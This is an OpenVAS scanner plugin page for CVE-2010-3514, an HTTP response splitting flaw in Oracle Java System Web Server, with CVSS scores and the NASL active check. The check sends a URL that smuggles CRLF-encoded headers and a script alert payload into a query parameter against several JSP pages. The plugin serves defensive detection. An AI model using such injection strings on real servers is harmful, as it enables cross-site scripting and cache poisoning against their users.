Oracle Java System Web Server HTTP Response Splitting Vulnerability - Active Check

2010-11-0200:00:00

plugins.openvas.org

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.3 Medium

AI Score

Confidence

Low

0.002 Low

EPSS

Percentile

61.0%

JSON

Oracle Java System Web Server is prone to an HTTP response
splitting vulnerability.

# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.801532");
  script_version("2023-10-27T05:05:28+0000");
  script_tag(name:"last_modification", value:"2023-10-27 05:05:28 +0000 (Fri, 27 Oct 2023)");
  script_tag(name:"creation_date", value:"2010-11-02 18:01:36 +0100 (Tue, 02 Nov 2010)");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");

  script_cve_id("CVE-2010-3514");

  script_tag(name:"qod_type", value:"remote_analysis");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Oracle Java System Web Server HTTP Response Splitting Vulnerability - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2010 Greenbone AG");
  script_family("Web Servers");
  script_dependencies("gb_get_http_banner.nasl");
  script_mandatory_keys("SunWWW/banner");
  script_require_ports("Services/www", 80);

  script_tag(name:"summary", value:"Oracle Java System Web Server is prone to an HTTP response
  splitting vulnerability.");

  script_tag(name:"insight", value:"The flaw is due to input validation error in the
  'response.setHeader()' method which is not properly sanitising before being returned to the user.
  This can be exploited to insert arbitrary HTTP headers, which will be included in a response sent
  to the user.");

  script_tag(name:"affected", value:"Oracle Java System Web Server 6.x/7.x.");

  script_tag(name:"solution", value:"Apply the referenced vendor update.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to conduct a
  cross-site scripting (XSS) and browser cache poisoning attacks.");

  script_xref(name:"URL", value:"http://inj3ct0r.com/exploits/14530");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/15290/");
  script_xref(name:"URL", value:"http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html#AppendixSUNS");
  script_xref(name:"URL", value:"http://sunsolve.sun.com/search/document.do?assetkey=1-79-1215353.1-1");

  exit(0);
}

include("http_func.inc");
include("port_service_func.inc");

port = http_get_port(default: 80);

banner = http_get_remote_headers(port: port);
if (!banner || "Server: Sun-" >!< banner)
  exit(0);

host = http_host_name(port: port);

foreach files (make_list("login.jsp", "index.jsp", "default.jsp", "admin.jsp")) {

  url = "/" + files + "?ref=http://" + host +
        "/%0D%0AContent-type:+text/html;%0D%0A%0D%0ATEST%3Cscript%3Ealert(111)%3C/script%3E";

  req = http_get(item: url, port: port);
  res = http_send_recv(port: port, data: req);

  if (egrep(string: res, pattern:"^HTTP/1\.[01] 200") && "TEST<script>alert(111)</script>" >< res) {
    report = http_report_vuln_url(port: port, url: url);
    security_message(port: port, data: report);
    exit(0);
  }
}

exit(99);